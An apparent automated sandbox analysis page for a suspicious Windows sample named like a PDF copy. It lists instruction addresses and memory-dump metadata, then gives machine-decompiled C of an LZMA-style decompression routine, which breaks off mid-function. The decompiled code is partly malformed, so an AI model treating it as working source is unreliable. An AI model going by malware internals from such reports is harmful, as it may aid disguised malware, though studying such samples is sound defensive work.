                                                                                            0x00406f82
                                                                                            0x00406f85
                                                                                            0x00406f89
                                                                                            0x00406f8c
                                                                                            0x00406f92
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f97
                                                                                            0x00406f9a
                                                                                            0x00406f9a
                                                                                            0x00406fa0
                                                                                            0x00406f3e
                                                                                            0x00406f3e
                                                                                            0x00406f41
                                                                                            0x00000000
                                                                                            0x00406f41
                                                                                            0x00406fa2
                                                                                            0x00406fa2
                                                                                            0x00406fa5
                                                                                            0x00406fa8
                                                                                            0x00406fab
                                                                                            0x00406fae
                                                                                            0x00406fb1
                                                                                            0x00406fb4
                                                                                            0x00406fb7
                                                                                            0x00406fba
                                                                                            0x00406fbd
                                                                                            0x00406fc0
                                                                                            0x00406fd8
                                                                                            0x00406fdb
                                                                                            0x00406fde
                                                                                            0x00406fe1
                                                                                            0x00406fe1
                                                                                            0x00406fe4
                                                                                            0x00406fe8
                                                                                            0x00406fea
                                                                                            0x00406fc2
                                                                                            0x00406fc2
                                                                                            0x00406fca
                                                                                            0x00406fcf
                                                                                            0x00406fd1
                                                                                            0x00406fd3
                                                                                            0x00406fd3
                                                                                            0x00406fed
                                                                                            0x00406ff4
                                                                                            0x00406ff7
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00407286
                                                                                            0x00407286
                                                                                            0x0040728a
                                                                                            0x004075b1
                                                                                            0x00000000
                                                                                            0x004075b1
                                                                                            0x00407290
                                                                                            0x00407293
                                                                                            0x00407296
                                                                                            0x0040729a
                                                                                            0x0040729d
                                                                                            0x004072a3
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407056
                                                                                            0x00407056
                                                                                            0x00407059
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x00407395
                                                                                            0x00407399
                                                                                            0x004073bb
                                                                                            0x004073be
                                                                                            0x004073c8
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x0040739b
                                                                                            0x0040739e
                                                                                            0x004073a2
                                                                                            0x004073a5
                                                                                            0x004073a5
                                                                                            0x004073a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407452
                                                                                            0x00407456
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x0040747b
                                                                                            0x00407482
                                                                                            0x00407489
                                                                                            0x00407489
                                                                                            0x00000000
                                                                                            0x00407489
                                                                                            0x00407458
                                                                                            0x0040745b
                                                                                            0x0040745e
                                                                                            0x00407461
                                                                                            0x00407468
                                                                                            0x004073ac
                                                                                            0x004073ac
                                                                                            0x004073af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407543
                                                                                            0x00407546
                                                                                            0x00407447
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040717d
                                                                                            0x0040717f
                                                                                            0x00407186
                                                                                            0x00407187
                                                                                            0x00407189
                                                                                            0x0040718c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407194
                                                                                            0x00407197
                                                                                            0x0040719a
                                                                                            0x0040719c
                                                                                            0x0040719e
                                                                                            0x0040719e
                                                                                            0x0040719f
                                                                                            0x004071a2
                                                                                            0x004071a9
                                                                                            0x004071ac
                                                                                            0x004071ba
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407490
                                                                                            0x00407490
                                                                                            0x00407493
                                                                                            0x0040749a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040749f
                                                                                            0x0040749f
                                                                                            0x004074a3
                                                                                            0x004075db
                                                                                            0x00000000
                                                                                            0x004075db
                                                                                            0x004074a9
                                                                                            0x004074ac
                                                                                            0x004074af
                                                                                            0x004074b3
                                                                                            0x004074b6
                                                                                            0x004074bc
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074c1
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c7
                                                                                            0x004074c7
                                                                                            0x004074cb
                                                                                            0x0040752b
                                                                                            0x0040752e
                                                                                            0x00407533
                                                                                            0x00407534
                                                                                            0x00407536
                                                                                            0x00407538
                                                                                            0x0040753b
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00000000
                                                                                            0x0040744d
                                                                                            0x00407447
                                                                                            0x004074cd
                                                                                            0x004074d3
                                                                                            0x004074d6
                                                                                            0x004074d9
                                                                                            0x004074dc
                                                                                            0x004074df
                                                                                            0x004074e2
                                                                                            0x004074e5
                                                                                            0x004074e8
                                                                                            0x004074eb
                                                                                            0x004074ee
                                                                                            0x00407507
                                                                                            0x0040750a
                                                                                            0x0040750d
                                                                                            0x00407510
                                                                                            0x00407514
                                                                                            0x00407516
                                                                                            0x00407516
                                                                                            0x00407517
                                                                                            0x0040751a
                                                                                            0x004074f0
                                                                                            0x004074f0
                                                                                            0x004074f8
                                                                                            0x004074fd
                                                                                            0x004074ff
                                                                                            0x00407502
                                                                                            0x00407502
                                                                                            0x0040751d
                                                                                            0x00407524
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x004071c2
                                                                                            0x004071c5
                                                                                            0x004071fb
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732e
                                                                                            0x0040732e
                                                                                            0x00407331
                                                                                            0x00407333
                                                                                            0x004075bd
                                                                                            0x00000000
                                                                                            0x004075bd
                                                                                            0x00407339
                                                                                            0x0040733c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407342
                                                                                            0x00407346
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00000000
                                                                                            0x00407349
                                                                                            0x004071c7
                                                                                            0x004071c9
                                                                                            0x004071cb
                                                                                            0x004071cd
                                                                                            0x004071d0
                                                                                            0x004071d1
                                                                                            0x004071d3
                                                                                            0x004071d5
                                                                                            0x004071d8
                                                                                            0x004071db
                                                                                            0x004071f1
                                                                                            0x004071f6
                                                                                            0x0040722e
                                                                                            0x0040722e
                                                                                            0x00407232
                                                                                            0x0040725e
                                                                                            0x00407260
                                                                                            0x00407267
                                                                                            0x0040726a
                                                                                            0x0040726d
                                                                                            0x0040726d
                                                                                            0x00407272
                                                                                            0x00407272
                                                                                            0x00407274
                                                                                            0x00407277
                                                                                            0x0040727e
                                                                                            0x00407281
                                                                                            0x004072ae
                                                                                            0x004072ae
                                                                                            0x004072b1
                                                                                            0x004072b4
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00000000
                                                                                            0x00407328
                                                                                            0x004072b6
                                                                                            0x004072bc
                                                                                            0x004072bf
                                                                                            0x004072c2
                                                                                            0x004072c5
                                                                                            0x004072c8
                                                                                            0x004072cb
                                                                                            0x004072ce
                                                                                            0x004072d1
                                                                                            0x004072d4
                                                                                            0x004072d7
                                                                                            0x004072f0
                                                                                            0x004072f2
                                                                                            0x004072f5
                                                                                            0x004072f6
                                                                                            0x004072f9
                                                                                            0x004072fb
                                                                                            0x004072fe
                                                                                            0x00407300
                                                                                            0x00407302
                                                                                            0x00407305
                                                                                            0x00407307
                                                                                            0x0040730a
                                                                                            0x0040730e
                                                                                            0x00407310
                                                                                            0x00407310
                                                                                            0x00407311
                                                                                            0x00407314
                                                                                            0x00407317
                                                                                            0x004072d9
                                                                                            0x004072d9
                                                                                            0x004072e1
                                                                                            0x004072e6
                                                                                            0x004072e8
                                                                                            0x004072eb
                                                                                            0x004072eb
                                                                                            0x0040731a
                                                                                            0x00407321
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00407321
                                                                                            0x00407234
                                                                                            0x00407237
                                                                                            0x00407239
                                                                                            0x0040723c
                                                                                            0x0040723f
                                                                                            0x00407242
                                                                                            0x00407244
                                                                                            0x00407247
                                                                                            0x0040724a
                                                                                            0x0040724a
                                                                                            0x0040724d
                                                                                            0x0040724d
                                                                                            0x00407250
                                                                                            0x00407257
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00407257
                                                                                            0x004071dd
                                                                                            0x004071e0
                                                                                            0x004071e2
                                                                                            0x004071e5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f44
                                                                                            0x00406f44
                                                                                            0x00406f48
                                                                                            0x0040758d
                                                                                            0x00000000
                                                                                            0x0040758d
                                                                                            0x00406f4e
                                                                                            0x00406f51
                                                                                            0x00406f54
                                                                                            0x00406f57
                                                                                            0x00406f5a
                                                                                            0x00406f5d
                                                                                            0x00406f60
                                                                                            0x00406f62
                                                                                            0x00406f65
                                                                                            0x00406f68
                                                                                            0x00406f6b
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070cf
                                                                                            0x004070cf
                                                                                            0x004070d3
                                                                                            0x00407599
                                                                                            0x00000000
                                                                                            0x00407599
                                                                                            0x004070d9
                                                                                            0x004070dc
                                                                                            0x004070df
                                                                                            0x004070e2
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e7
                                                                                            0x004070ea
                                                                                            0x004070ed
                                                                                            0x004070f0
                                                                                            0x004070f3
                                                                                            0x004070f6
                                                                                            0x004070f7
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070fc
                                                                                            0x004070ff
                                                                                            0x00407102
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407108
                                                                                            0x0040710a
                                                                                            0x0040710a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x00407350
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407356
                                                                                            0x00407359
                                                                                            0x0040735c
                                                                                            0x0040735f
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407364
                                                                                            0x00407367
                                                                                            0x0040736a
                                                                                            0x0040736d
                                                                                            0x00407370
                                                                                            0x00407373
                                                                                            0x00407374
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407379
                                                                                            0x0040737c
                                                                                            0x0040737f
                                                                                            0x00407382
                                                                                            0x00407385
                                                                                            0x00407389
                                                                                            0x0040738b
                                                                                            0x0040738e
                                                                                            0x00000000
                                                                                            0x00407390
                                                                                            0x0040710d
                                                                                            0x0040710d
                                                                                            0x00000000
                                                                                            0x0040710d
                                                                                            0x0040738e
                                                                                            0x004075c3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bf2
                                                                                            0x004075fa
                                                                                            0x004075fa
                                                                                            0x00000000
                                                                                            0x004075fa
                                                                                            0x00407447
                                                                                            0x004073ce
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x00407002

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                            • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                            • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                            • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 98%
                                                                                            			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
